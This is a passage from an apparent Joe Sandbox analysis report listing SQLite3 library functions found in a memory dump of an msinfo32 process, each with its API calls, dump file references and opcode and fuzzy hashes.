                                                                                                              • Opcode ID: 38b77bc76c27b742a4e69bb07ae8f76a66b6bb3a3a243d0a1d9e74c6d9d1d7ad
                                                                                                              • Instruction ID: e194f253705f6012b8348f6016eb501228a2ce6462e91501b5f2aa4a4dd6f36f
                                                                                                              • Opcode Fuzzy Hash: 38b77bc76c27b742a4e69bb07ae8f76a66b6bb3a3a243d0a1d9e74c6d9d1d7ad
                                                                                                              • Instruction Fuzzy Hash: 34114F70E14A59CBCF08DFB9C45055E77B6BBCA714B24C12AE955CB340D7B0E885CB84
                                                                                                              Function 61E0AAAF Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,61E1472E), ref: 61E0AAD9
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,61E1472E), ref: 61E0AB15
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,61E1472E), ref: 61E0AB2E
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,61E1472E), ref: 61E0AB41
                                                                                                              • sqlite3_free.SQLITE3(?,?,?,61E1472E), ref: 61E0AB49
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 251237202-0
                                                                                                              • Opcode ID: 3a9fcfe7018dbb2dcfd141b97f907e38f4420f1ddfd80476771b728406cdfefa
                                                                                                              • Instruction ID: b73658e1be605ae13d2bafc82247eb3d9d269d045194d4574426c2dfe719642c
                                                                                                              • Opcode Fuzzy Hash: 3a9fcfe7018dbb2dcfd141b97f907e38f4420f1ddfd80476771b728406cdfefa
                                                                                                              • Instruction Fuzzy Hash: B911D0749A4A59CFCB00AFB884C051C7BE4EB4634AB25882AD869C7381E734C4908B52
                                                                                                              Function 61E32AEF Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E326FD: sqlite3_realloc64.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000,?,61E32B0A), ref: 61E32650
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E32CFB
                                                                                                              • sqlite3_log.SQLITE3 ref: 61E32D7C
                                                                                                                • Part of subcall function 61E090C5: memcmp.MSVCRT ref: 61E0911F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmpsqlite3_freesqlite3_logsqlite3_realloc64
                                                                                                              • String ID:
                                                                                                              • API String ID: 167025251-3916222277
                                                                                                              • Opcode ID: 2d067c4bbb1c2e20b32a20baf2dbc6c595bfebb92808a50fe8bd681e8fe6aa1c
                                                                                                              • Instruction ID: d8a982f690804032e731d972e0d628ab4a60d8b1c586cfb9031fc61a39a1d21f
                                                                                                              • Opcode Fuzzy Hash: 2d067c4bbb1c2e20b32a20baf2dbc6c595bfebb92808a50fe8bd681e8fe6aa1c
                                                                                                              • Instruction Fuzzy Hash: F2E10870A0425A8FDB54CFB9C88478DBBF1BF98318F208569D858AB395D774D885CF80
                                                                                                              Function 61E20FC2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 227COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E21041
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E21078
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_str_append
                                                                                                              • String ID: $,
                                                                                                              • API String ID: 1074250351-71045815
                                                                                                              • Opcode ID: 6882dd6be40ade28bad78394499dd2b58b9636ad331012e7cffbd81b0219c315
                                                                                                              • Instruction ID: da2b5e7999d98e7e535af331f5703f1d0b8f89eadfe2a8c7c6accfab6422e1d4
                                                                                                              • Opcode Fuzzy Hash: 6882dd6be40ade28bad78394499dd2b58b9636ad331012e7cffbd81b0219c315
                                                                                                              • Instruction Fuzzy Hash: FCA15571908399CEEB218FA9C8A07997AF1AB07708F34C5D9D498DA241C776CBC5CF52
                                                                                                              Function 61E3AEF1 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 155COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3B0A1
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3B0CD
                                                                                                                • Part of subcall function 61E3AE97: sqlite3_vmprintf.SQLITE3 ref: 61E3AEB0
                                                                                                                • Part of subcall function 61E3AE97: sqlite3_mprintf.SQLITE3 ref: 61E3AECE
                                                                                                                • Part of subcall function 61E3AE97: sqlite3_free.SQLITE3 ref: 61E3AEDA
                                                                                                                • Part of subcall function 61E3AE97: sqlite3_free.SQLITE3 ref: 61E3AEE2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_mprintf$sqlite3_vmprintf
                                                                                                              • String ID: AND$NOT
                                                                                                              • API String ID: 966554101-2843896482
                                                                                                              • Opcode ID: 5896a1511d2f3f767c1925fb1abfa91f24c86c5aeb7f36dff186fe37598bf800
                                                                                                              • Instruction ID: 26fede997e7882e520c499001da9dcd96c88a12e1fd07f46b4d1ad90a513ebc0
                                                                                                              • Opcode Fuzzy Hash: 5896a1511d2f3f767c1925fb1abfa91f24c86c5aeb7f36dff186fe37598bf800
                                                                                                              • Instruction Fuzzy Hash: 7A5139B0A49B628BDB119F65C08161EFBE1AFC9308F30C82DE495973A0D735D8C2DB52
                                                                                                              Function 61E49DAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_mprintf
                                                                                                              • String ID: NEAR$phrase
                                                                                                              • API String ID: 1840970956-1639708222
                                                                                                              • Opcode ID: 18eb3e8d04b34261e2f2426c23d9d104dcbac766c17f105b185283a044ca1ff8
                                                                                                              • Instruction ID: 6b0188ed6bf1a6e368cc78753b98e276d704bd2a5e486c1f54fa0d4b54fa308b
                                                                                                              • Opcode Fuzzy Hash: 18eb3e8d04b34261e2f2426c23d9d104dcbac766c17f105b185283a044ca1ff8
                                                                                                              • Instruction Fuzzy Hash: 85516A706042068FDB25CF95E284B59B7E1FB89328F30C559E8589F351D77AD882CB81
                                                                                                              Function 61E25F49 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_win32_is_nt
                                                                                                              • String ID: winAccess
                                                                                                              • API String ID: 2284118020-3605117275
                                                                                                              • Opcode ID: 8ba4ce319bc0a61824ce645bf5a36abaf7b54e120290805165acb9f87c3ac48a
                                                                                                              • Instruction ID: 33974d772cce066ad2c4799766f06ac767811005d74099756e6509baab9e505e
                                                                                                              • Opcode Fuzzy Hash: 8ba4ce319bc0a61824ce645bf5a36abaf7b54e120290805165acb9f87c3ac48a
                                                                                                              • Instruction Fuzzy Hash: DF319E319042558FEB108EA4C960B9EBBF1EF88328F35C629EC6497384D778D946DB91
                                                                                                              Function 61E3C940 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E35F6F: sqlite3_value_text.SQLITE3 ref: 61E35F85
                                                                                                                • Part of subcall function 61E35F6F: sqlite3_value_bytes.SQLITE3 ref: 61E35F92
                                                                                                                • Part of subcall function 61E35F6F: sqlite3_get_auxdata.SQLITE3 ref: 61E35FCD
                                                                                                                • Part of subcall function 61E35F6F: memcmp.MSVCRT ref: 61E35FF5
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3C9A7
                                                                                                                • Part of subcall function 61E3C83D: sqlite3_mprintf.SQLITE3 ref: 61E3C88F
                                                                                                                • Part of subcall function 61E3C83D: sqlite3_result_error.SQLITE3 ref: 61E3C8A9
                                                                                                                • Part of subcall function 61E3C83D: sqlite3_free.SQLITE3 ref: 61E3C8B1
                                                                                                              • sqlite3_result_subtype.SQLITE3 ref: 61E3CA4B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text$memcmpsqlite3_freesqlite3_get_auxdatasqlite3_mprintfsqlite3_result_errorsqlite3_result_subtypesqlite3_value_bytes
                                                                                                              • String ID: J$null
                                                                                                              • API String ID: 3173415908-802103870
                                                                                                              • Opcode ID: a93d8319028b35a88f63db1e833443767357f64e4b7f12206771d2aaa99f7809
                                                                                                              • Instruction ID: d25f73ee004c10dd883591b1e7afd4dc23f94bc70be11538b8a2d171f4ce4d20
                                                                                                              • Opcode Fuzzy Hash: a93d8319028b35a88f63db1e833443767357f64e4b7f12206771d2aaa99f7809
                                                                                                              • Instruction Fuzzy Hash: B1313E70B002B9DBDB20DF25C480B4977B1AFC5358F21C4AAE85A8B301DB35DA86CF51
                                                                                                              Function 61E3CB8D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3CBC8
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3CBE8
                                                                                                              • sqlite3_result_value.SQLITE3 ref: 61E3CC30
                                                                                                                • Part of subcall function 61E3C59A: sqlite3_mprintf.SQLITE3 ref: 61E3C5AF
                                                                                                                • Part of subcall function 61E3C59A: sqlite3_result_error.SQLITE3 ref: 61E3C5C5
                                                                                                                • Part of subcall function 61E3C59A: sqlite3_free.SQLITE3 ref: 61E3C5CD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_value
                                                                                                              • String ID: replace
                                                                                                              • API String ID: 822508682-211625029
                                                                                                              • Opcode ID: 2fd885c43475b2203a1519bf884efba990c8d4c5288b02ca919e66d831f03ff2
                                                                                                              • Instruction ID: 3d8ccba2b2455ba07c482daa842110204c6cc5d33f2c0eb5a1407bd5937360a6
                                                                                                              • Opcode Fuzzy Hash: 2fd885c43475b2203a1519bf884efba990c8d4c5288b02ca919e66d831f03ff2
                                                                                                              • Instruction Fuzzy Hash: 452150307083A99BCB05DF69C484A9DBBE5AFC5358F24C41EEC988B350D775E985CB41
                                                                                                              Function 61E1B95B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E1B979
                                                                                                                • Part of subcall function 61E1923C: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18EC6,?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E19244
                                                                                                              • sqlite3_realloc.SQLITE3 ref: 61E1B9C7
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E1B9DD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                                              • String ID: d
                                                                                                              • API String ID: 211589378-2564639436
                                                                                                              • Opcode ID: 67c3ec3fce4c0ce2a817e1b6b07967d48cefd174ddba59761d7dde80af0ea07b
                                                                                                              • Instruction ID: 494a31e26037c76ec06fb66fc30030726d117f6c38e009f6d59107f2dbb28b4a
                                                                                                              • Opcode Fuzzy Hash: 67c3ec3fce4c0ce2a817e1b6b07967d48cefd174ddba59761d7dde80af0ea07b
                                                                                                              • Instruction Fuzzy Hash: 2C21E6B1A04215CFDB00DFA9C4C1789BBF5EF89314F15C569C9489B319E738E841CB61
                                                                                                              Function 61E1D66A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1D681
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_aggregate_context
                                                                                                              • String ID: "$,$\
                                                                                                              • API String ID: 2928764607-4027707629
                                                                                                              • Opcode ID: fc266afc5a25716fb983c49b886557de3c89f8783b94e69f2fc03d92353a81bb
                                                                                                              • Instruction ID: 15bcad2ec42c4606f7fd11b94ed92cc29a6e61278db101a0c4c0360f484d80df
                                                                                                              • Opcode Fuzzy Hash: fc266afc5a25716fb983c49b886557de3c89f8783b94e69f2fc03d92353a81bb
                                                                                                              • Instruction Fuzzy Hash: 73110476E092148FD7048E69D489A96BBA5FB88324F29852ADC1C8B355C275E8418BD1
                                                                                                              Function 61E1E3F9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_int$sqlite3_result_blob
                                                                                                              • String ID: <
                                                                                                              • API String ID: 2918918774-4251816714
                                                                                                              • Opcode ID: 1089bc06fa6fc0fd0bf545526097a5c2da5c931e777b1d3891ed1a215f463c3a
                                                                                                              • Instruction ID: 4fa9548e054220a0c98da78721b3bf398eab768da299e2e0cfd94482ec90e66b
                                                                                                              • Opcode Fuzzy Hash: 1089bc06fa6fc0fd0bf545526097a5c2da5c931e777b1d3891ed1a215f463c3a
                                                                                                              • Instruction Fuzzy Hash: 281167B5904206CFCB00CF6AD480A9ABBF5FF88364F15C56AE8188B321E374E951CF90
                                                                                                              Function 61E2831B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E2820F: sqlite3_log.SQLITE3(?,?,?,?,?,61E282C2), ref: 61E2824A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E2834E
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E28389
                                                                                                                • Part of subcall function 61E25225: sqlite3_log.SQLITE3 ref: 61E2524E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                              • String ID: out of memory
                                                                                                              • API String ID: 2575432037-2599737071
                                                                                                              • Opcode ID: 226b3234f3498706fefb535ca2b881cf7a07e3b698f341132c56a11e30cf9068
                                                                                                              • Instruction ID: 76e6aed7329a1ee64119d2e15a7456d315fff638105063a4dbb2a06cd8864f1d
